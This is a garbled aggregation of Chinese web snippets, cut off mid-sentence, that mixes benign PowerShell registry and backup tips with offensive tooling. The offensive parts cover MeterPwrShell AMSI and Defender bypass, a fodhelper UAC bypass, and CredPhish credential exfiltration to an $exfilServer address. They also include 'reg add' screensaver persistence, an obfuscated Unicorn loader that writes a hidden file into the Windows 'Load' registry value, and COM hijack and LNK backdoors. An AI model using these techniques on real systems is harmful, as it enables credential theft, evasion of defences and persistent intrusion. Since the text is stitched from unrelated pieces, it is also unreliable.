不再使用的时候一个一个关闭它们也是一件麻烦事情,所以官方文档还为我们介绍了如何关闭除当前窗口外的所有Powershell进程。...Get-ItemProperty -Path 'HKCU:\Control Panel\Desktop\MuiCached' -Name MachinePreferredUILanguages 编辑注册表项...$path = "HKCU:\Control Panel\Desktop" 如果要新建注册表项,可以使用New-Item命令。我们可以使用注册表编辑器regedit来验证项是否创建成功。...Remove-Item -path $path\hellokey -Recurse 获取当前.NET版本 下面的参考资料中列出了一个MSDN上的文档,告诉我们如何读取注册表的值来判断当前安装了.NET...使用它,我们可以在没有安装Excel的情况下编辑Excel文件。 首先需要安装它,可以利用Powershell的包管理器方便的安装。
关于MeterPwrShell MeterPwrShell是一款功能强大的自动化工具,可以帮助广大研究人员以自动化的形式生成完美的PowerShell Payload。...MeterPwrShell基于Metasploit框架和amsi.fail实现其功能,可以生成PowerShell One-Liner,并能够创建Meterpreter Shell,而且还可以绕过AMSI...功能介绍 使用PrependMigrate实现自动化免杀; 自动从普通用户提权为SYSTEM权限; 禁用所有的防火墙配置; 绕过Windows Defender实时保护功能; Payload免杀; 绕过...可轻松绕过Windows Defender; 工具要求 Kali Linux、Ubuntu或Debian; Metasploit框架; 接入网络(目标主机和攻击者主机都需要); 工具下载 广大研究人员可以使用下列命令将该项目源码克隆至本地...: git clone https://github.com/GetRektBoy724/MeterPwrShell.git 工具使用 # .
接下来笔者通过该程序大致地讲解一下如何通过fodhelper.exe绕过UAC。首先我们需要在微软官网中下载sigcheck来帮助我们检查软件是否具备autoElevate属性。...可以看到fodhelper.exe会查询注册表中 HKCU\Software\Classes\mscfile\shell\open\command的值,后面也会多次出现shell\open这个注册表项,...使用Powershell中的New-Item命令就可以在指定注册表中创建一个新的键,使用命令New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open...Force,给 HKCU\Software\Classes\ms-settings\shell\open\command\添加一个名为DelegateExecute的值。...可以在default值中设置启动程序,在Powershell中运行代码清单4-23所示代码,执行结果如图1-9所示,虽然像这种注册表的Bypass UAC还有很多,不过大部分都只能针对Windows 10
注册表编辑器还不支持按住Shift进行多选,所以只能使用脚本进行批量删除。!!!友情提示,删除之前请进行注册表备份,或者你百分比确定你的代码没有问题,再执行,否则发生的任何损失,本文概不负责!!!...注册表路径以及如何获得注册表子项在PowerShell中注册表也有路径,跟我们文件和文件夹路径类似,上面的注册表项的路径可以表示为:REGISTRY::\HKEY_USERS\S-1-5-21-3610452307...那我们如何获得该注册表路径下面的所有子项呢?...基于条件过滤删除项因为我们要删除的子项名称中都包含“kzip_main.exe”这样的字符,所以我们使用Where-Object命令(别名where或者?)...命令选择出来要删除的元素以后,我们可以使用ForEach_Object命令(别名foreach或者%)遍历该数组删除所有元素,代码如下:$items | % {rm -Force -Recurse $_
默认情况下,CredPhish 将使用 Resolve-DnsName(PowerShell 内置的 DNS 解析器)来窃取凭据。...它将凭据中的每个字符转换为其各自的十六进制值,将转换后的值分解为预定义的块,并将这些块放入流行网站的子域中。以下屏幕截图是十六进制形式的泄露凭据示例。...# exfil 地址 $exfilServer = "192.168.56.112" 接下来,几个变量定义了提示将如何呈现给毫无戒心的目标用户。...为避免怀疑, 1 是默认值。该 delayPrompts 变量定义了每个提示之间的秒数(如果 maxTries 大于 1)。...PowerShell 执行它。
如何使用PowerShell批量删除注册表项 问题描述 注册表路径以及如何获得注册表子项 基于条件过滤删除项 For循环删除子项 问题描述 卸载了可牛压缩软件以后,发现右键菜单中仍然有可牛压缩的选项。...注册表编辑器还不支持按住Shift进行多选,所以只能使用脚本进行批量删除。 !!!...注册表路径以及如何获得注册表子项 在PowerShell中注册表也有路径,跟我们文件和文件夹路径类似,上面的注册表项的路径可以表示为: REGISTRY::\HKEY_USERS\S-1-5-21-3610452307...那我们如何获得该注册表路径下面的所有子项呢?...基于条件过滤删除项 因为我们要删除的子项名称中都包含“kzip_main.exe”这样的字符,所以我们使用Where-Object命令(别名where或者?)
关于PowerShx PowerShx是一款功能强大的PowerShell软件,在该工具的帮助下,广大研究人员可以在目标主机上摆脱任何软件的限制从而执行PowerShell代码。...功能介绍 使用exe、installuitl.exe、regsvcs.exe、regasm.exe、regsvr*32.exe来运行PowerShel; 在不需要exe或powershell_ise.exe...的情况下运行PowerShell;AMSI绕过功能; 直接通过命令行工具或PowerShell文件运行PowerShell脚本; 导入PowerShell模块和执行PowerShell Cmdlet;...工具依赖 · .Net 4 工具使用 .dll版本 rundll32 rundll32 PowerShx.dll,main -e 需要运行的PS脚本...下面的例子中演示了如何在Handle()方法中调用Payload: private void Handle(Options options) { // Pre-execution before user
屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。众所周知,Windows的此功能被威胁参与者滥用为持久性方法。...屏幕保护程序设置存储在注册表中,从令人反感的角度来看,最有价值的值是: HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE HKEY_CURRENT_USER...reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\tmp\pentestlab.exe reg add "hkcu\control panel...Nishang框架包含一个PowerShell脚本,该脚本也可以执行此攻击,但与上述方法相比,它需要管理级别的特权,因为它在本地计算机中使用注册表项来存储将执行远程托管有效负载的PowerShell命令...在这种情况下,可以使用Metasploit Web交付模块生成并托管PowerShell负载。
#> #使用Unicorn生成已编码的powershell命令。...#隐藏文件 $fileObj = get-item $payloadvbsloaderpath -Force $fileObj.Attributes = "Hidden" #新建注册表 $HKCU1...= "HKCU:\" $HKCU2 = "Software\Microsoft" $HKCU3 = "\Windows NT\Current" $HKCU4 = "Version\Windows" $...HKCU = $HKCU1 + $HKCU2 + $HKCU3 + $HKCU4 #操作注册表的值 Set-ItemProperty -Path $HKCU -Name LOAD -Value $payloadvbsloaderpath
欢迎使用Markdown编辑器写博客 本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传...—— [ 维基百科 ] 使用简单的符号标识不同的标题,将某些文字标记为粗体或者斜体,创建一个链接等,详细语法参考帮助?。 本编辑器支持 Markdown Extra , 扩展了很多好用的功能。...离线写博客 即使用户在没有网络的情况下,也可以通过本编辑器离线写博客(直接在曾经使用过的浏览器中输入write.blog.csdn.net/mdeditor即可。...Markdown编辑器使用浏览器离线存储将内容保存在本地。 用户写博客的过程中,内容实时保存在浏览器缓存中,在用户关闭浏览器或者其它异常情况下,内容不会丢失。...浏览器兼容 目前,本编辑器对Chrome浏览器支持最为完整。建议大家使用较新版本的Chrome。
当然,这只是一个实例,加入打算备份每一个数据库在备份在各自的数据库实例的服务器上,又该如何修改上面的语句那?...假如你的工作中包含了备份数据库,那么使用PowerShell来备份数据库就是一种值得使用的方式了,尤其是当你数据库服务器上都有PowerShell的时候。...Out-GridView 如何使用 下面这个例子使用了Out-GridView 命令,这个场景下,我选择三个数据库,然后会只备份我选择的三个。 ? 另一个很有用的功能就是过滤。...注意:这是在PowerShell ISE中,其他的编辑器可能会有不同的弹出参数的的触发。比如我尝试了在PowerShell console 中需要用“Crtl”+空格键才会触发。...本文中显示的所有代码都是使用SqlServer PowerShell模块完成的,该模块使用SSMS 2016(16.5+),而我的机器运行的是PowerShell的5.1版本。
当然,这只是一个实例,加入打算备份每一个数据库在备份在各自的数据库实例的服务器上,又该如何修改上面的语句那?...假如你的工作中包含了备份数据库,那么使用PowerShell来备份数据库就是一种值得使用的方式了,尤其是当你数据库服务器上都有PowerShell的时候。...Out-GridView 如何使用 下面这个例子使用了Out-GridView 命令,这个场景下,我选择三个数据库,然后会只备份我选择的三个。 另一个很有用的功能就是过滤。...再次返回最上面的备份例子中,如在备份指令后添加一个-CompressionOption参数,然后空格会显示几个可选参数,如on、off、default等, 注意:这是在PowerShell ISE中,其他的编辑器可能会有不同的弹出参数的的触发...本文中显示的所有代码都是使用SqlServer PowerShell模块完成的,该模块使用SSMS 2016(16.5+),而我的机器运行的是PowerShell的5.1版本。
Windows操作系统在全球市场上的占比是大家有目共睹的,而现代Windows平台都默认安装了PowerShell,而且系统管理员还可以毫无限制地访问和使用PowerShell终端。...BenTurner 和 Dave Hardy 这两位安全研究人员开发出了一款基于 PowerShell 和C#的命令控制工具- PoshC2 ,这款工具不仅实现了各种各样的攻击技术,而且使用起来也非常简单...PoshC2还可以生成各种功能强大的Payload,研究人员可以在渗透测试或安全评估过程中使用这些Payload。 ?...与PowerShell会话类似,它也能接收任何的PowerShell命令或PoshC2命令,相关命令可以在帮助菜单中找到: ?...总结 PoshC2最大的优势就在于它使用的是PowerShell,因此它的植入程序不需要任何其他的依赖组件,这种特性与其他很多用Python开发的命令控制工具很相似。
Tips : PowerShell提供程序使用此命令来浏览不同类型的数据存储。...例如可以使用此cmdlet获取文件对象的LastAccessTime属性的值。...Tips : 非常不建议使用(Get-ItemProperty HKCU:\Software\Testkey).Entry3此种方法取值,虽然貌似简练,可读性强,但事实上它先得读取所有值效率稍低。...\LineNumbers.txt -Stream addcontent PowerSheel PowerShell # 3.过滤器与通配符的使用 # 将值附加到当前目录中的文本文件,但根据文件名排除文件...Tips: HKCU:, HKLM:预定义的两个重要注册表根目录虚拟驱动器或者不使用预定义的情况registry::来指定注册表的全路径。
0x02 COM 用于一定程度隐藏网络行为日志 通过InternetExplorer.Application对象访问网络 使用如下的powershell命令访问http网络: $ieObject= New-Object...使用如下的powershell命令直接访问网络下载文件 $client = new-object System.Net.WebClient$client.DownString('1.1.1.1/a')...0x03 COM hijack 用于防御逃逸和持久化 ATT&CK模型中T1122项目对此有详细描述 APT28曾使用此技术。 HKCR key是HKCU和HKLM的虚拟表示。...当从HKCR读取key值时,首先从HKCU\Software\Classes\clsid读取key值,如果不存在,则从HKLM读取key值.同时中低权限进程无法修改HKLM,但可以修改HKCU.因此所谓...COM hijack就是修改HKCU中的xxxx\InprocServer32中的值。
前言 在我们获得初始会话之后,我们需要考虑如何让我们的访问持久化。原因很简单,如果我们是通过利用漏洞进来的,对方可能察觉到痕迹然后修补漏洞,如果是通过泄漏的密码进来的,对方可能修改密码。...calc.exe" -n "zhi" -m add -o hourly (向右滑动,查看更多) 隐藏 上诉创建的计划任务持久化不够隐蔽,很容易被发现,我们可以通过访问注册表 ,并且删除后门计划任务的SD值,...侧写 每当用户运行 PowerShell.exe 的时候,PowerShell 侧写文件会被加载。...我们可以在该文件中写入一个计划任务,例如执行命令 touch /tmp/crontab,那么我们在末尾添加 * * * * * root touch /tmp/crontab,保存,等候一分钟,如果以特定用户创建计划任务,我们可以使用...crontab-e 命令来编辑 passwd 与 shadow 我们可以在 /etc/passwd文件中写入一个后门 root 账户,密码我们可以借助 openssl生成。
背景 PowerShell在过去的几年里在Offensive安全社区被广泛使用。但随着防御性安全行业的推进,正致使攻击性工具包从PowerShell迁移到反射C#以逃避现代安全产品的检测。...其中一些改进包括脚本块记录,反恶意软件脚本接口(AMSI)以及第三方安全供应商针对恶意PowerShell活动签名的开发。...下图中显示的示例在“HKCU\Software\Microsoft\Windows\CurrentVersion\Run”注册表项中创建名为“Test”的注册表值,其值为“cmd.exe/c calc.exe...我们正在删除先前创建的“Test”注册表值,然后我们列出了“HKCU\Software\Microsoft\Windows\CurrentVersion\Run”的所有注册表值,以验证其是否已被成功删除...通过发布SharPersist,我们希望让人们能够了解Windows中可用的各种持久性技术,以及使用C#而不是PowerShell的方式使用这些持久性技术的能力。
用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。...1、安装后门 这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本...2、实现原理 它会将原来快捷目标修改为powershell.exe的地址,并且利用powershell去运行navicat程序与恶意代码。 ? 解密后的代码 ?...点击快捷方式后先执行快捷方式原来链接的目标,然后在注册表读取HKCU:\Software\Microsoft\Windows\debug的值运行(后门安装时把执行的代码加密后放到了HKCU:\Software...4、总结 利用快捷方式去攻击,已经是一个很老的话题了,但是有时候渗透中添加启动项/服务/任务计划失败的情况下可以尝试用此方法,劫持一个经常使用的程序快捷方式,达到权限维持的效果,windows下基于powershell
那么,通过漏洞获取到目标主机权限后,如何利用渗透框架获得持久性权限呢?...该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;-X:设置后门在系统启动后自启动。...权限) 生成的相关文件位置 : # 后门文件位置: C:\Windows\Temp C:\Users\Administrator\AppData\Local\Temp# 注册表位置: HKCU...如何清除后门,最简单的方法就是使用Autoruns,选择WMI选项卡,右键就可以删除恶意后门。 ?...根据需要可以自己选择,填写所需参数默认端口是80(需要注意的就是不要使用重复端口),Type选择powershell。 ? 点击Launch后,返回powershell远程下载执行命令。 ?
有时我们需要将枚举定义为1,2,4,8.......的值,这样当传入一个3,那么就是表示1,2的组合,如果传入7,那就表示1,2,4的组合。要实现这种功能我们需要用到FlagsAttribute。...Flags] public enum FormType { Reimburse=, Payment=, Precharge=, PO= } 2.组合枚举值的判断
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
